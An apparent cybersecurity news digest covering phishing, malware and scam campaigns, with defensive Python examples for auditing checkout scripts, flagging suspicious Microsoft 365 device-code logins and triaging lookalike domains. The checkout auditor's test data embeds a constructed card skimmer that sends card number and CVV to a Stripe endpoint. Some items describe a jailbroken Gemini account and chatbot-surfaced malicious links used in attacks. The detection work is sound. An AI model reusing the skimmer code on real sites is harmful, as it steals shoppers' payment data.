1D ago
4 sources
Researchers say multiple criminal groups have built fake FIFA websites to steal World Cup fans’ passwords, payment details, and money through bogus ticket sales. Group-IB identified four separate campaigns since August 2025, including a Chinese-speaking operation it calls GHOST STADIUM that uses more than 300 active lookalike domains and roughly 3,800 dormant ones. The phishing kit closely copies FIFA’s login flow, can trigger password-reset steps to lock victims out, and is being promoted through Facebook ads offering unrealistically cheap tickets.
— Fans trying to buy 2026 World Cup tickets could lose their accounts, have legitimate tickets resold, or pay scammers for fake seats. Users should only type fifa.com directly into their browser, avoid ad-linked ticket offers, and treat lookalike FIFA domains as suspicious.
Sources: Chinese-speaking fraud gang could be stealing millions from 2026 World Cup fans, FBI warns of fake FIFA websites running World Cup fraud schemes, In Other News: Trump Mobile Data Breach, FIFA World Cup Phishing, CISA Responds to Supply Chain Attacks (+1 more)
2D ago
1 source
A likely North Korean-linked group sent more than 250 fake job and code-review emails to developers at nearly 100 organizations, mainly in the United States, to steal login credentials and cryptocurrency wallets. Proofpoint tracks the activity as UNK_DeadDrop and says the attackers used spoofed company brands and attacker-controlled GitHub repositories posing as coding tests or crypto projects; victims were told to clone and open the repos in tools such as Visual Studio Code or Cursor, triggering cross-platform malware on macOS, Linux, and Windows.
— Developers and the companies that employ them are the direct targets, and a single successful lure can expose source code, cloud access, and crypto assets. Organizations should warn staff about unsolicited recruiting emails, scrutinize GitHub-based coding tests, and isolate or block unknown repositories and scripts.
Sources: Norks blast 250+ fake job offers to developers over 6 weeks to try and snarf creds and crypto
2D ago
1 source
Attackers are tricking bank customers into installing fake Android banking app updates from GitHub so they can steal card data and PINs. D3Lab says newer NFCShare variants, seen since May 14, target banks mainly in Italy and Spain after victims visit phishing sites impersonating real banks. The malware abuses Android's near-field communication (NFC) API, opening an IsoDep connection to the victim's physical card and issuing EMV commands to read its details, then sends the data to command-and-control servers over WebSocket.
— This can lead directly to payment-card fraud because victims are persuaded to hand over both card details and their PIN during a fake security check. Android users should only install banking apps from Google Play and treat any request to scan a bank card with their phone or sideload an update from GitHub as suspicious.
Sources: NFCShare Android malware spreads via fake banking app updates on GitHub
2D ago
7 sources
The FBI says Silent Ransom Group is targeting U.S. law firms by pretending to be IT support, then stealing data and extorting victims without encrypting files. In 2026 attacks, the group reportedly used callback phishing emails, phone-based social engineering, remote desktop access, and in some cases sent an operative on site to insert a USB or external drive after a failed remote-access attempt; the attackers then used tools such as WinSCP and Rclone to exfiltrate data.
— Law firms and other organizations should treat unsolicited IT calls, emails, and in-person support visits as potential attack vectors, not just remote phishing. The warning is urgent because the attackers use legitimate admin tools and leave few traces, so organizations should verify IT identities, restrict external-drive use, and harden remote-access workflows now.
Sources: FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data, FBI warns of in-person data theft attacks from extortion gang, FBI warns extortion hackers are visiting US law firms to steal data (+4 more)
5D ago
2 sources
Attackers are tricking people looking for popular PC utilities into installing malware that secretly uses their graphics cards to mine cryptocurrency. Microsoft says the campaign uses search-engine optimization (SEO) poisoning and, in some cases, attacker-controlled links surfaced in AI chatbot responses for tools such as CrystalDiskInfo, HWMonitor, FurMark, K-Lite Codec Pack, PDFgear, and Display Driver Uninstaller. The fake downloads bundle a legitimate program with a malicious dynamic-link library (DLL), install ScreenConnect for remote access, add multiple Windows persistence mechanisms, evade Microsoft Defender, and then deploy GPU miners including gminer, lolMiner, and SRBMiner-MULTI.
— This campaign targets owners of powerful Windows systems and can leave victims with both hijacked hardware and a remote-access backdoor for follow-on attacks. Users and defenders should avoid downloading software from AI-generated or unfamiliar links, verify vendor domains, and hunt for the listed indicators of compromise and unauthorized ScreenConnect installs.
Sources: GPU mining malware spreads via SEO poisoning, AI chatbots, In Other News: Anthropic Maps AI Threats, Unpatched Comodo Flaw, Palantir Chief Eyed for CISA
6D ago
1 source
A newly identified extortion group called Pink is calling employees while pretending to be IT support, then stealing account credentials and company data to demand payment. Palo Alto Networks Unit 42 says the group, tracked as CL-CRI-1147 and likely linked to the criminal network known as The Com, uses voice phishing and fake help-desk interactions to capture passwords and multifactor authentication (MFA) approvals, then raids services such as SharePoint, OneDrive, and Microsoft Teams. Unit 42 said Pink's leak site went live on May 31 and published domains and IP addresses tied to the campaign as indicators of compromise.
— This matters to organizations that rely on cloud productivity tools because attackers do not need malware or software flaws if they can talk staff into handing over access. Companies should warn staff about unsolicited help-desk calls, tighten help-desk identity checks, review Microsoft 365 logs, and block or investigate the listed phishing infrastructure immediately.
Sources: Pink is the latest goon squad to use fake helpdesk calls to steal creds
6D ago
1 source
Researchers say a new Magecart card-skimming campaign is stealing shoppers’ payment details from compromised online stores and hiding both its malware and stolen data inside trusted Google Tag Manager and Stripe services. Sansec says the skimmer targets Magento and Adobe Commerce checkout pages, pulls JavaScript from a Google Tag Manager container, retrieves payload code from Stripe customer metadata tied to customer ID cus_TfFjAAZQNOYENR, and exfiltrates stolen card, billing, email, and phone data by creating fake Stripe customer records; a variant uses Google Firestore instead of Stripe. The Stripe record was reportedly created on December 24, 2025, suggesting the campaign may have been active for months.
— This matters because stores may allow traffic to Google Tag Manager and Stripe by default, letting the skimmer blend in and evade common security controls while stealing card data from real customers. Online retailers using Magento or Adobe Commerce should urgently inspect GTM containers, Stripe API activity, and checkout-page scripts for unauthorized changes.
Sources: Credit card theft campaign abuses Stripe to host stolen payment info
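The check the previous item asks retailers to make, written out as an added example (not Sansec's code and not part of the original item): collect every script on a checkout page, compare the Google Tag Manager container IDs and external script URLs against the baseline the store owns, and flag any inline script that both reads card fields and writes to a SaaS endpoint a store would normally allow (a Stripe customer-creation call or Firestore). The page content, the container IDs, the allowlists and the Stripe key placeholder are all constructed for the example.

```python
import re
from html.parser import HTMLParser

# Constructed sample of a Magento/Adobe Commerce checkout page. The first version
# is what the store deployed; the second has two injected inline scripts of the
# kind described above (an extra GTM container loader and a skimmer that parks
# card data in a Stripe customer record). The Stripe key is a placeholder.
CLEAN_CHECKOUT_HTML = """<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-ABC1234');</script>
<script src="https://js.stripe.com/v3/"></script>
<script src="https://shop.example/static/frontend/checkout.js"></script>
</head><body>
<form id="co-payment-form"><input name="payment[cc_number]"><input name="payment[cc_cid]"></form>
</body></html>"""

INJECTED_SCRIPTS = """<script>(function(w,d,s,l,i){var j=d.createElement(s);
j.src='https://www.googletagmanager.com/gtm.js?id='+i;d.head.appendChild(j);
})(window,document,'script','dataLayer','GTM-ZZZ9999');</script>
<script>document.querySelector('#co-payment-form').addEventListener('submit',function(){
var n=document.querySelector('[name="payment[cc_number]"]').value;
var c=document.querySelector('[name="payment[cc_cid]"]').value;
fetch('https://api.stripe.com/v1/customers',{method:'POST',
headers:{Authorization:'Bearer sk_live_ATTACKER_KEY_PLACEHOLDER','Content-Type':'application/x-www-form-urlencoded'},
body:'name='+encodeURIComponent(n)+'&description='+encodeURIComponent(c)});});</script>
"""
COMPROMISED_CHECKOUT_HTML = CLEAN_CHECKOUT_HTML.replace("</body>", INJECTED_SCRIPTS + "</body>")

# Baseline the store owns: its real GTM container(s) and the external scripts
# that belong on the checkout page (both assumed for this example).
GTM_ALLOWLIST = {"GTM-ABC1234"}
SCRIPT_ALLOWLIST = {"https://js.stripe.com/v3/",
                    "https://shop.example/static/frontend/checkout.js"}

GTM_ID_RE = re.compile(r"GTM-[A-Z0-9]{4,}")
# Endpoints a skimmer can write to that a store's CSP/egress rules usually permit
EXFIL_HOST_RE = re.compile(r"https://(api\.stripe\.com/v1/customers|firestore\.googleapis\.com)")
CARD_FIELD_RE = re.compile(r"cc_number|cc_cid|cc_exp|card[_-]?number|cvv|cvc|expir", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def audit_checkout(html, gtm_allowlist=GTM_ALLOWLIST, script_allowlist=SCRIPT_ALLOWLIST):
    """Return (kind, detail) findings for scripts that do not belong on checkout."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        ids = GTM_ID_RE.findall(src)
        if ids:
            findings += [("unknown_gtm_container", g) for g in ids if g not in gtm_allowlist]
        elif src not in script_allowlist:
            findings.append(("unlisted_external_script", src))
    for body in p.inline:
        # A second GTM loader with an unknown container ID is the hallmark of
        # the campaign above: the tag manager is trusted, the container is the
        # attacker's.
        findings += [("unknown_gtm_container", g)
                     for g in sorted(set(GTM_ID_RE.findall(body))) if g not in gtm_allowlist]
        m = EXFIL_HOST_RE.search(body)
        # Card-field access plus a write to a trusted SaaS API from a checkout
        # script is exfiltration, whatever the destination's reputation.
        if m and CARD_FIELD_RE.search(body):
            findings.append(("card_data_to_trusted_saas", m.group(1)))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_checkout(COMPROMISED_CHECKOUT_HTML):
        print(f"{kind}: {detail}")
```

Run against the clean page the audit returns nothing; against the compromised page it reports the unknown container GTM-ZZZ9999 and the Stripe customer-creation call. The point of keying on the container ID rather than on the googletagmanager.com host is that a hostname allowlist or CSP that permits GTM permits every container, so the baseline has to be the IDs the store actually uses, and the same goes for the Stripe account behind an `api.stripe.com` call.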
6D ago
3 sources
A Chinese-speaking cybercrime group is using new malware and localized phishing messages to break into organizations in Europe and beyond. Proofpoint says TA4922, whose activity overlaps with Silver Fox and Void Arachne, has targeted entities in Germany, Italy, the United Kingdom, South Africa, and parts of Southeast Asia since March 2026 using payroll, tax, VAT, invoice, and HR lures sent by email and messaging apps including WhatsApp, LINE, and Microsoft Teams. The campaigns deploy Atlas RAT, RomulusLoader, SilentRunLoader, and Winos4.0/ValleyRAT for remote access, file theft, credential theft, keylogging, screenshots, and webcam or audio capture.
— Organizations in the targeted regions should treat this as an active intrusion and phishing threat, especially finance, HR, and compliance teams that may receive convincing local-language messages. Defenders should hunt for the named malware families and remote-management tools, tighten phishing controls, and warn staff to verify unexpected payroll, tax, invoice, or compliance messages across email and chat platforms.
Sources: Chinese hackers use new Atlas RAT malware in European cyberattacks, Chinese Cybercrime Group in Spotlight for Record Campaign Pace, China-Linked TA4922 Expands Phishing Attacks to UK, Germany, Italy, and South Africa
6D ago
1 source
Law enforcement and major tech companies say they disrupted more than 1.4 million accounts and related infrastructure used by scam networks operating from Southeast Asia. The operation, called Disruption Week, involved the US Department of Justice, Royal Thai Police, and firms including Apple, Google, Meta, Microsoft, Coinbase, SpaceX, Silent Push, TRM Labs, and Zenlayer; it led to 63 arrests, the freezing of over $3.8 million in cryptocurrency, and takedowns of social-media accounts, Microsoft accounts, Starlink kits, servers, and malicious network infrastructure linked to fraud compounds in Cambodia, Laos, and Burma.
— This matters because the operation targeted industrial-scale scam networks that steal money from victims worldwide and rely on mainstream platforms and connectivity to operate. Users should remain cautious of investment and impersonation scams, while defenders and platforms should watch for follow-on account rebuilds, infrastructure shifts, and related fraud activity.
Sources: Over 1.4 Million Accounts Disrupted in Cybercrime Crackdown
7D ago
1 source
Police in Europe and the United States say they broke up nine organized crime groups running illegal streaming services and arrested 29 suspects. The seven-month Operation KRATOS 2, led by Bulgaria with Europol support, involved 13 countries and led to the removal of more than 27,000 illegal streaming URLs, identification of 18,000 IP addresses tied to illegal services, 4,370 piracy-linked domains, nearly 400,000 additional URLs flagged for suspension, and 126,000 infringing objects. Investigators say the operators split public-facing sites from backend hosting across jurisdictions to evade takedowns.
— People using pirate streaming services are not just risking copyright trouble; Europol says these platforms can also expose users to malware, spyware, and theft of personal data. The story matters because it shows the scale and international reach of the criminal infrastructure behind these services, and affected users should avoid such platforms and check devices for suspicious software if they used them.
Sources: Police dismantles 9 crime groups in illegal streaming crackdown
7D ago
1 source
Google is adding a new Android feature that warns people when a call may be a scammer pretending to be someone they know. The feature, called fake call detection, is rolling out globally this month on Android 12 and later, starting with Pixel devices, and is enabled by default. It works when both parties use Phone by Google, Contacts, and Google Messages with Rich Communication Services (RCS) enabled, using encrypted device-to-device verification to detect spoofed contact calls and trigger an on-screen warning.
— This addresses a real-world fraud tactic that combines fake caller ID with AI-generated voice impersonation, which can trick people into sending money or revealing sensitive information. Android users should keep Google's phone and messaging apps updated and treat urgent calls asking for money, codes, or account access with caution.
Sources: Google adds Android protection against AI deepfake scam calls
8D ago
2 sources
A large malware campaign has infected more than 116,000 computers by tricking Minecraft players into downloading booby-trapped mods, cheat clients, and utilities. McAfee says the WeedHack operation has been active since January 2026, spreads via YouTube links and search-result manipulation, and uses thousands of malicious Java archive (JAR) files. The malware steals browser passwords and cookies, Minecraft session IDs, Discord, Steam and Telegram credentials, and crypto-wallet data, while paid tiers add remote-control features such as keylogging, webcam access, shell access, and file management.
— This is a broad consumer-focused infostealer campaign hitting gamers at scale, with stolen passwords, session tokens, and wallet data creating immediate account-takeover and financial risk. Minecraft players and parents should avoid unofficial mod download sites, remove suspicious JAR files, run antivirus scans, and reset passwords for any accounts used on affected devices.
Sources: Over 116,000 Minecraft systems infected in WeedHack malware campaign, Over 116,000 Minecraft systems infected in WeedHack malware campaign
8D ago
4 sources
The FBI says criminals are using a Telegram-based service called Kali365 to trick people into granting access to their Microsoft 365 accounts. The phishing-as-a-service platform, first seen in April 2026, abuses Microsoft's legitimate device-code login flow: the attacker starts the flow and sends the victim the resulting code, and when the victim enters it at Microsoft's device-login page, the victim's own sign-in authorizes the session the attacker started. The OAuth access and refresh tokens issued to that session can then be reused to access Outlook, Teams and OneDrive without the victim's password or another multi-factor authentication prompt.
— This matters because victims can lose control of email, files and collaboration accounts even if multi-factor authentication is enabled. Organizations using Microsoft 365 should urgently restrict the device code flow where it is not needed, review token protections, monitor sign-in logs for device-code logins from unfamiliar addresses and for suspicious inbox rules, and warn users never to enter a device code that arrived in an unsolicited message.
Sources: FBI warns of Kali365 phishing-as-a-service after April Microsoft 365 attacks, FBI warns of Kali365 phishing service targeting Microsoft 365 accounts, From Token Bingo to MAX Takeover: Kali365 Operator Expands Operation Across Microsoft Outlook, Okta, Xerox DocuShare, and Other Services (+1 more)
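An added example of the sign-in-log check the previous item recommends, not code from the FBI advisory or from any vendor: build each user's baseline of addresses from earlier interactive logins, flag a successful device-code login from an address outside that baseline, and count the sign-ins from the same address that follow it within a window (that follow-on activity is the stolen refresh token being redeemed). The records are constructed in the shape of Microsoft Entra ID sign-in log entries, with the field names Entra uses (`authenticationProtocol`, `ipAddress`, `appDisplayName`) and `status` reduced to its `errorCode`; the users, addresses and timestamps are invented.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sample in the shape of Entra ID sign-in log records. Alice is the
# victim: she types a code the attacker generated, then the attacker's host
# redeems the refresh token for mail and files with no further MFA. Bob runs a
# legitimate device-code login (Azure CLI) from his usual address.
SAMPLE_SIGNINS = [
    {"createdDateTime": "2026-05-01T12:00:00Z", "userPrincipalName": "bob@example.com",
     "authenticationProtocol": "authorizationCode", "ipAddress": "203.0.113.22",
     "location": "US", "status": {"errorCode": 0}, "appDisplayName": "Office 365 SharePoint Online"},
    {"createdDateTime": "2026-05-02T08:01:00Z", "userPrincipalName": "alice@example.com",
     "authenticationProtocol": "authorizationCode", "ipAddress": "203.0.113.10",
     "location": "US", "status": {"errorCode": 0}, "appDisplayName": "Microsoft Teams"},
    {"createdDateTime": "2026-05-03T09:15:00Z", "userPrincipalName": "alice@example.com",
     "authenticationProtocol": "authorizationCode", "ipAddress": "203.0.113.10",
     "location": "US", "status": {"errorCode": 0}, "appDisplayName": "Office 365 Exchange Online"},
    # The device-code flow was started on the attacker's machine, so its address
    # is what the log records even though Alice did the authenticating.
    {"createdDateTime": "2026-05-04T10:30:00Z", "userPrincipalName": "alice@example.com",
     "authenticationProtocol": "deviceCode", "ipAddress": "198.51.100.77",
     "location": "NG", "status": {"errorCode": 0}, "appDisplayName": "Microsoft Authentication Broker"},
    {"createdDateTime": "2026-05-04T10:41:00Z", "userPrincipalName": "alice@example.com",
     "authenticationProtocol": "none", "ipAddress": "198.51.100.77",
     "location": "NG", "status": {"errorCode": 0}, "appDisplayName": "Office 365 Exchange Online"},
    {"createdDateTime": "2026-05-04T11:05:00Z", "userPrincipalName": "alice@example.com",
     "authenticationProtocol": "none", "ipAddress": "198.51.100.77",
     "location": "NG", "status": {"errorCode": 0}, "appDisplayName": "OneDrive SyncEngine"},
    {"createdDateTime": "2026-05-04T12:00:00Z", "userPrincipalName": "bob@example.com",
     "authenticationProtocol": "deviceCode", "ipAddress": "203.0.113.22",
     "location": "US", "status": {"errorCode": 0}, "appDisplayName": "Microsoft Azure CLI"},
]

# Refresh-token redemptions ("none") and device-code logins themselves must not
# vouch for an address; only interactive logins build the user's baseline.
NON_BASELINE_PROTOCOLS = {"deviceCode", "none"}


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_suspicious_device_code_logins(events, followup_window=timedelta(hours=2)):
    """Flag successful device-code sign-ins from an address the user has never
    logged in from interactively, and count the token use that follows them."""
    events = sorted(events, key=lambda e: parse_ts(e["createdDateTime"]))
    baseline = defaultdict(set)   # user -> addresses seen on earlier interactive logins
    alerts = []
    for i, e in enumerate(events):
        if e["status"]["errorCode"] != 0:
            continue
        user, ip = e["userPrincipalName"], e["ipAddress"]
        if e["authenticationProtocol"] == "deviceCode":
            if ip in baseline[user]:
                continue                       # same address as prior logins: Bob's case
            t0 = parse_ts(e["createdDateTime"])
            reuse = [f for f in events[i + 1:]
                     if f["userPrincipalName"] == user and f["ipAddress"] == ip
                     and parse_ts(f["createdDateTime"]) - t0 <= followup_window]
            alerts.append({
                "user": user, "ip": ip, "location": e["location"],
                "time": e["createdDateTime"], "app": e["appDisplayName"],
                "token_reuse_events": len(reuse),
                "reused_apps": sorted({f["appDisplayName"] for f in reuse}),
            })
        elif e["authenticationProtocol"] not in NON_BASELINE_PROTOCOLS:
            baseline[user].add(ip)
    return alerts


if __name__ == "__main__":
    for a in find_suspicious_device_code_logins(SAMPLE_SIGNINS):
        print(f"{a['time']} {a['user']} device-code login from {a['ip']} ({a['location']}) "
              f"via {a['app']}; {a['token_reuse_events']} follow-on sign-ins: {a['reused_apps']}")
```

On the sample this produces one alert, for Alice, with two follow-on sign-ins from the attacker's address; Bob's Azure CLI login is not reported because his address is already in his baseline. In a tenant with Sentinel the same first filter is `SigninLogs | where AuthenticationProtocol == "deviceCode"`, and where the device code flow is not needed at all it can be blocked outright with a Conditional Access policy that uses the authentication flows condition, which removes the lure's mechanism rather than detecting it after the fact.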
8D ago
1 source
The Police Service of Northern Ireland warned that scammers spoofed its official switchboard number to call people while pretending to be police officers. In the reported case, the caller falsely claimed the target was tied to a money-transfer investigation, asked for bank-card information, and then requested gift cards and their codes; police said the number display was faked and no suspect has yet been arrested. The same police force also disclosed a separate crypto-investment fraud in which an elderly woman lost more than £250,000 after attackers persuaded her to install malware and took control of her devices.
— People may trust a call that appears to come from a real police number, so this scam raises the risk of financial theft even for cautious users. Anyone receiving such a call should hang up, independently verify the number, and never provide banking details or gift-card codes to someone claiming to be law enforcement.
Sources: Northern Ireland cops issue PSA after official phone number spoofed by scammers
9D ago
1 source
Security researchers say more than 5,000 election-themed internet domains were registered in recent weeks ahead of the 2026 U.S. midterms, raising the risk of fake voting sites, donation scams, and impersonation of election officials. Check Point said the registrations increased sharply between April and May and coincided with roughly 17,000 exposed credentials tied to ActBlue, WinRed, GOP, Democrats.org, and USA.gov accounts, creating infrastructure and account access that could support phishing, fraud, or influence operations.
— This matters because voters, donors, campaigns, and election workers could be tricked by lookalike sites or targeted through reused or stolen passwords. People should verify election and donation websites carefully, avoid links in unsolicited messages, and reset passwords if they may have been exposed.
Sources: Election interlopers register 5K+ domains, hope to catch some voting phish
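Both the FIFA item above (300 active lookalike domains) and this one (5,000 election-themed registrations) come down to the same triage question: of a batch of newly seen domains, which ones are trading on a protected brand? The following is an added example of that check, written for this page and not taken from Group-IB, Check Point or any vendor. It folds common confusable characters before matching, treats a brand token anywhere in the hostname (including as a fake subdomain) as a lookalike, and catches one-edit typos with a Damerau-Levenshtein distance. The brand list, the legitimate domains, the tiny public-suffix table and the domain batch are all constructed for the example; a real deployment would use the Public Suffix List.

```python
# Brand tokens worth protecting and the registrable domains that are really
# theirs. Constructed for this example; a real deployment loads its own list.
PROTECTED = {
    "fifa": {"fifa.com"},
    "actblue": {"actblue.com"},
    "winred": {"winred.com"},
}

# Assumption: a two-label suffix table this small is enough for the sample.
# Production code should use the Public Suffix List (e.g. the publicsuffix2 package).
MULTI_LABEL_SUFFIXES = {"co.uk", "com.au", "com.br"}

# Characters and digraphs attackers swap in to look like the brand
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w", "cl": "d"}


def registrable_domain(host):
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def skeleton(text):
    """Fold confusables and separators so 'vvin-red' compares as 'winred'."""
    s = text.lower()
    for src, dst in CONFUSABLES.items():
        s = s.replace(src, dst)
    return s.replace("-", "").replace("_", "")


def osa_distance(a, b):
    """Damerau-Levenshtein (optimal string alignment): a transposition is one edit."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(host):
    """Return (verdict, brand): legitimate, brand_in_lookalike, typosquat or unrelated."""
    reg = registrable_domain(host)
    for brand, legit in PROTECTED.items():
        if reg in legit:
            return ("legitimate", brand)     # any subdomain of the real domain is fine
    folded_host = skeleton(host)
    for brand in PROTECTED:
        # Brand token anywhere in the name, including as a fake subdomain such
        # as fifa.com.ticket-portal.net, once confusables are folded.
        if brand in folded_host:
            return ("brand_in_lookalike", brand)
    sld = skeleton(reg.split(".")[0])
    for brand in PROTECTED:
        if osa_distance(sld, brand) <= 1:
            return ("typosquat", brand)
    return ("unrelated", None)


def triage(domains):
    """Map each newly observed domain to its verdict, dropping the unrelated ones."""
    return {d: classify(d) for d in domains if classify(d)[0] != "unrelated"}


# Constructed list standing in for a day's newly registered or newly seen domains
SAMPLE_NEW_DOMAINS = [
    "fifa.com", "tickets.fifa.com", "fifa-tickets2026.com", "fifa.com.ticket-portal.net",
    "fiifa.com", "vvinred.com", "actbule.com", "uefa.com", "vote-secure-2026.org",
]

if __name__ == "__main__":
    for host, (verdict, brand) in triage(SAMPLE_NEW_DOMAINS).items():
        print(f"{host:32} {verdict:20} {brand}")
```

The deliberate ordering matters: the registrable-domain check runs first so that a real subdomain such as tickets.fifa.com is never flagged, the substring check runs on the whole hostname so that a brand buried in a subdomain of someone else's domain is caught, and only the registrable label is subjected to the edit-distance test, since applying it to long hostnames produces noise. Domains the triage passes (uefa.com, a generic vote-secure-2026.org) are not declared safe, only not lookalikes of the brands on the list.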
12D ago
4 sources
Charter Communications says it suffered a security incident after the ShinyHunters extortion group threatened to leak stolen data. The attackers claim they breached Charter on April 1 by using voice phishing (vishing) to compromise an employee's Microsoft Entra account, then used that access to reach Charter's Salesforce environment and export customer records, including names, contact details, plan information, support tickets, and some customer proprietary network information (CPNI); the attackers put the haul at about 40 million records, while subsequent reporting puts the affected accounts at about 4.9 million, and Charter disputes that sensitive personal data or CPNI was exfiltrated.
— Charter serves tens of millions of customers, so even partial account and service data exposure could create follow-on phishing, fraud, and impersonation risks. Affected users should watch for targeted calls and emails referencing Spectrum or account details, while defenders should review identity-provider protections, help-desk verification, and Salesforce access logs.
Sources: Charter confirms data breach after ShinyHunters extortion threat, Charter Communications data breach affects 4.9 million accounts, ShinyHunters adds Charter to trophy shelf after 4.9M customer records leak (+1 more)
12D ago
1 source
A North Carolina man was sentenced to prison for selling elderly Americans' personal information to scammers who used it in lottery fraud schemes. Troy Murray pleaded guilty to conspiracy to commit wire fraud and was sentenced to 121 months after prosecutors said he sold at least 22,000 lead lists between 2016 and 2023 containing names, phone numbers, physical addresses, and email addresses of over 7 million seniors; authorities said the scheme generated more than $5.2 million for him and caused over $9.5 million in victim losses.
— This matters because it shows how stolen or traded personal data directly fuels large-scale fraud against older adults. People, especially seniors and their families, should be wary of unsolicited calls or messages about prizes or lotteries, and defenders and policymakers can use the case as a concrete indicator of fraud infrastructure and data-broker abuse.
Sources: Man sent to prison for selling data of 7 million elderly Americans
13D ago
2 sources
A newly highlighted Android malware family called BTMOB can give criminals broad control over infected phones, including stealing data and taking over the device. ESET says the remote access trojan (RAT) is spread through phishing pages and fake app stores, abuses Android Accessibility Services to gain elevated privileges, and is sold with an APK-building kit that lets buyers customize lures by country and brand. The campaign has mainly been observed in Latin America.
— This is more serious than a typical banking trojan because it can turn an Android phone into a remotely controlled spying and theft tool. Android users should avoid app downloads from links in messages or fake stores, and defenders should watch for phishing infrastructure and abuse of Accessibility permissions.
Sources: New BTMOB Android Malware Enables Full Device Takeover, BTMOB Android malware service generates custom phishing payloads
18D ago
1 source
Italian authorities say they dismantled CINEMAGOAL, a piracy app operation that let customers watch paid streaming services by using stolen or fraudulently obtained access credentials. Investigators say the system used virtual machines in Italy to capture valid authentication and decryption codes from legitimate subscriptions every three minutes, then redistributed them through servers seized in France and Germany. The probe, coordinated with Eurojust, included 100 searches, identified more than 70 resellers, and also disrupted a related IPTV service.
— This matters because it was not just copyright infringement but a large-scale unauthorized-access and fraud scheme built around stolen streaming credentials and infrastructure designed to hide users. Streaming providers and affected subscribers should watch for fraudulent account creation and abuse, while defenders should note the use of virtual machines, foreign servers, crypto payments, and fake identities to operate the service.
Sources: Italy disrupts CINEMAGOAL piracy app that stole streaming auth codes
19D ago
1 source
A Russian-speaking threat actor allegedly used a jailbroken Google Gemini account to run a months-long scam and theft campaign aimed at QAnon and MAGA communities, stealing WordPress admin credentials and draining at least one victim's cryptocurrency wallets. TrendAI says the operation ran from September 2025 to May 2026 through a Telegram channel with about 17,000 subscribers, used 73 likely stolen Gemini API keys, pushed a fake StellarMonster wallet app that actually installed the GoToResolve remote access tool, and captured victims' seed phrases through a bogus wallet-import screen.
— This matters because it blends political-community targeting, AI-assisted social engineering, malware, and direct crypto theft in a way ordinary users can fall for and defenders may miss. Users should avoid wallet apps and recovery prompts promoted in Telegram channels, while organizations should investigate exposed WordPress credentials and watch for abuse of stolen API keys.
Sources: A Russian speaker and jailbroken Gemini went on a hacking spree and emptied at least one MAGA victim's crypto wallets
19D ago
1 source
Two former executives of call-tracking firm C.A. Cloud pleaded guilty to concealing a years-long tech-support scam operation that targeted victims worldwide. Prosecutors say the company knowingly provided phone numbers, call forwarding, recordings, and rotating number pools to fraudsters behind fake malware-warning pop-ups, including scammers impersonating Microsoft and Apple; the pair also allegedly ran a Tunisia call center where employees carried out similar fraud through remote computer access and false invoices.
— This matters because it shows the infrastructure behind tech-support scams is being targeted, not just the callers themselves, and the scams often hit older and vulnerable people. Users should be wary of pop-ups or calls claiming their computer is infected, especially if they demand remote access or immediate payment.
Sources: Former US execs plead guilty to aiding tech support scammers
20D ago
1 source
Two U.S. men pleaded guilty to helping India-based tech-support scam centers steal millions from Americans, including elderly and disabled victims. Prosecutors said they provided phone numbers, call routing, tracking, and forwarding services for fake malware pop-up scams from 2016 to 2022, continued after learning customers were fraudulent, and advised scammers to rotate large pools of numbers to evade detection; some victims also gave remote access to their devices, leading to financial theft.
— This shows how large tech-support scam operations rely on telecom and call-routing support inside the U.S., not just overseas call centers. People should be wary of pop-ups telling them to call for urgent computer help, and providers and defenders can use the case details to spot number rotation and call-forwarding tactics tied to fraud.
Sources: Two Americans plead guilty to assisting India-based tech support scam centers